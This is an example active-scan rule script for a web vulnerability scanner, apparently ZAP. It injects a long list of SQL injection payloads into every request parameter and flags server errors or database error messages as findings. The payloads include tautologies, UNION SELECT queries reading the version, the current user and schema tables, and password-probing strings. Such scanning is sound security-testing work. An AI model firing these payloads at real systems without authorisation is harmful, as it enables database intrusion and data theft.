Active scan script

1. // An example active scan rule script which uses a set of attack payloads and a set of regexes
2. // in order to find potential issues.
3. // Replace or extend the attacks and evidence regexes with you own values.
4.  
5. // Note that new active scripts will initially be disabled
6. // Right click the script in the Scripts tree and select "enable"  
7.  
8. // Replace or extend these with your own attacks
9. // put the attacks you most want to run higher, unless you disable the attack strength check
10. var attacks = ['==', '=', "'", "' --", "' #", "' –", "'--", "'/*", "'#", '" --', '" #', '"/*', "' and 1='1", "' and a='a", ' or 1=1', ' or true', "' or ''='", '" or ""="', "1′) and '1′='1–", "' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055", '" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055', ' and 1=1', ' and 1=1–', "' and 'one'='one", "' and 'one'='one–", "' group by password having 1=1--", "' group by userid having 1=1--", "' group by username having 1=1--", " like '%'", ' or 0=0 --', ' or 0=0 #', ' or 0=0 –', "' or         0=0 #", "' or 0=0 --", "' or 0=0 #", "' or 0=0 –", '" or 0=0 --', '" or 0=0 #', '" or 0=0 –', "%' or '0'='0", ' or 1=1', ' or 1=1--', ' or 1=1/*', ' or 1=1#', ' or 1=1–', "' or 1=1--", "' or '1'='1", "' or '1'='1'--", "' or '1'='1'/*", "' or '1'='1'#", "' or '1′='1", "' or 1=1", "' or 1=1 --", "' or 1=1 –", "' or 1=1--", "' or 1=1;#", "' or 1=1/*", "' or 1=1#", "' or 1=1–", "') or '1'='1", "') or '1'='1--", "') or '1'='1'--", "') or '1'='1'/*", "') or '1'='1'#", "') or ('1'='1", "') or ('1'='1--", "') or ('1'='1'--", "') or ('1'='1'/*", "') or ('1'='1'#", "'or'1=1", "'or'1=1′", '" or "1"="1', '" or "1"="1"--', '" or "1"="1"/*', '" or "1"="1"#', '" or 1=1', '" or 1=1 --', '" or 1=1 –', '" or 1=1--', '" or 1=1/*', '" or 1=1#', '" or 1=1–', '") or "1"="1', '") or "1"="1"--', '") or "1"="1"/*', '") or "1"="1"#', '") or ("1"="1', '") or ("1"="1"--', '") or ("1"="1"/*', '") or ("1"="1"#', ") or '1′='1–", ") or ('1′='1–", "' or 1=1 LIMIT 1;#", "'or 1=1 or ''='", '"or 1=1 or ""="', "' or 'a'='a", "' or a=a--", "' or a=a–", "') or ('a'='a", '" or "a"="a', '") or ("a"="a', '\') or (\'a\'=\'a and hi") or ("a"="a', "' or 'one'='one", "' or 'one'='one–", "' or uid like '%", "' or uname like '%", "' or userid like '%", "' or user like '%", "' or username like '%", "' or 'x'='x", "') or ('x'='x", '" or "x"="x', "' OR 'x'='x'#;", "'=' 'or' and '=' 'or'", "' UNION ALL SELECT 1, @@version;#", "' UNION ALL SELECT system_user(),user();#", "' UNION select table_schema,table_name FROM information_Schema.tables;#", "admin' and substring(password/text(),1,1)='7", "' and substring(password/text(),1,1)='7", "' or 1=1 limit 1 -- -+", '\'="or\'']
11.  
12.  
13. // Replace or extend these with your own evidence - regexes that indicate potential issues
14. // The default ones are a subset of https://github.com/fuzzdb-project/fuzzdb/blob/master/regex/errors.txt
15. var evidence = [
16.     "A syntax error has occurred",
17.     "Active Server Pages error",
18.     "ADODB.Field error",
19.     "An illegal character has been found in the statement",
20.     "An unexpected token .* was found",
21.     "ASP\.NET is configured to show verbose error messages",
22.     "ASP\.NET_SessionId",
23.     "Custom Error Message",
24.     "database error",
25.     "DB2 Driver",
26.     "DB2 Error",
27.     "DB2 ODBC",
28.     "detected an internal error",
29.     "Error converting data type varchar to numeric",
30.     "Error Diagnostic Information",
31.     "Error Report",
32.     "Fatal error",
33.     "Incorrect syntax near",
34.     "Index of",
35.     "Internal Server Error",
36.     "Invalid Path Character",
37.     "Invalid procedure call or argument",
38.     "invalid query",
39.     "Invision Power Board Database Error",
40.     "is not allowed to access",
41.     "JDBC Driver",
42.     "JDBC Error",
43.     "JDBC MySQL",
44.     "JDBC Oracle",
45.     "JDBC SQL",
46.     "Microsoft OLE DB Provider for ODBC Drivers",
47.     "Microsoft VBScript compilation error",
48.     "Microsoft VBScript error",
49.     "MySQL Driver",
50.     "mysql error",
51.     "MySQL Error",
52.     "mySQL error with query",
53.     "MySQL ODBC",
54.     "ODBC DB2",
55.     "ODBC Driver",
56.     "ODBC Error",
57.     "ODBC Microsoft Access",
58.     "ODBC Oracle",
59.     "ODBC SQL",
60.     "OLE/DB provider returned message",
61.     "on line",
62.     "on MySQL result index",
63.     "Oracle DB2",
64.     "Oracle Driver",
65.     "Oracle Error",
66.     "Oracle ODBC",
67.     "Parent Directory",
68.     "PHP Error",
69.     "PHP Parse error",
70.     "PHP Warning",
71.     "PostgreSQL query failed",
72.     "server object error",
73.     "SQL command not properly ended",
74.     "SQL Server Driver",
75.     "SQLException",
76.     "supplied argument is not a valid",
77.     "Syntax error in query expression",
78.     "The error occurred in",
79.     "The script whose uid is",
80.     "Type mismatch",
81.     "Unable to jump to row",
82.     "Unclosed quotation mark before the character string",
83.     "unexpected end of SQL command",
84.     "unexpected error",
85.     "Unterminated string constant",
86.     "Warning: mysql_query",
87.     "Warning: pg_connect",
88.     "You have an error in your SQL syntax near",
89. ]
90.  
91. /**
92.  * Scans a "node", i.e. an individual entry in the Sites Tree.
93.  * The scanNode function will typically be called once for every page.
94.  *
95.  * @param as - the ActiveScan parent object that will do all the core interface tasks
96.  *     (i.e.: sending and receiving messages, providing access to Strength and Threshold settings,
97.  *     raising alerts, etc.). This is an ScriptsActiveScanner object.
98.  * @param msg - the HTTP Message being scanned. This is an HttpMessage object.
99.  */
100. function scanNode(as, msg) {
101.     // Do nothing here - this script just attacks parameters rather than nodes
102. }
103.  
104. /**
105.  * Scans a specific parameter in an HTTP message.
106.  * The scan function will typically be called for every parameter in every URL and Form for every page.
107.  *
108.  * @param as - the ActiveScan parent object that will do all the core interface tasks
109.  *     (i.e.: sending and receiving messages, providing access to Strength and Threshold settings,
110.  *     raising alerts, etc.). This is an ScriptsActiveScanner object.
111.  * @param msg - the HTTP Message being scanned. This is an HttpMessage object.
112.  * @param {string} param - the name of the parameter being manipulated for this test/scan.
113.  * @param {string} value - the original parameter value.
114.  */
115. function scan(as, msg, param, value) {
116.     // Debugging can be done using print like this
117.     //print('scan called for url=' + msg.getRequestHeader().getURI().toString() +
118.     //  ' param=' + param + ' value=' + value);
119.    
120.     var max_attacks = attacks.length    // No limit for the "INSANE" level ;)
121.    
122.     if (as.getAttackStrength() == "LOW") {
123.         max_attacks = 6
124.     } else if (as.getAttackStrength() == "MEDIUM") {
125.         max_attacks = 12
126.     } else if (as.getAttackStrength() == "HIGH") {
127.         max_attacks = 24
128.     }
129.  
130.     for (var i in attacks) {
131.         // Dont exceed recommended number of attacks for strength
132.         // feel free to disable this locally ;)
133.         if (i > max_attacks) {
134.             return
135.         }
136.         // Copy requests before reusing them
137.         msg = msg.cloneRequest();
138.  
139.         // setParam (message, parameterName, newValue)
140.         as.setParam(msg, param, attacks[i]);
141.        
142.         // sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
143.         as.sendAndReceive(msg, false, false);
144.  
145.         // Add any generic checks here, eg
146.         var code = msg.getResponseHeader().getStatusCode()
147.         if (code >= 500 && code < 600) {
148.             raiseAlert(as, msg, param, attacks[i], code)
149.             // Only raise one alert per param
150.             return
151.         }
152.  
153.         var body = msg.getResponseBody().toString()
154.         var re = new RegExp(evidence.join("|"), "i")
155.         var found = body.match(re)
156.         if (found) {    // Change to a test which detects the vulnerability
157.             raiseAlert(as, msg, param, attacks[i], found)
158.             // Only raise one alert per param
159.             return
160.         }
161.    
162.         // Check if the scan was stopped before performing lengthy tasks
163.         if (as.isStop()) {
164.             return
165.         }
166.     }
167. }
168.  
169. function raiseAlert(as, msg, param, attack, evidence) {
170.     // Replace with more suitable information
171.     // raiseAlert(risk, int confidence, String name, String description, String uri,
172.     //      String param, String attack, String otherInfo, String solution, String evidence,
173.     //      int cweId, int wascId, HttpMessage msg)
174.     // risk: 0: info, 1: low, 2: medium, 3: high
175.     // confidence: 0: falsePositive, 1: low, 2: medium, 3: high, 4: confirmed
176.     as.raiseAlert(1, 1, 'Active Vulnerability Title', 'Full description',
177.         msg.getRequestHeader().getURI().toString(),
178.         param, attack, 'Any other info', 'The solution ', evidence, 0, 0, msg);
179. }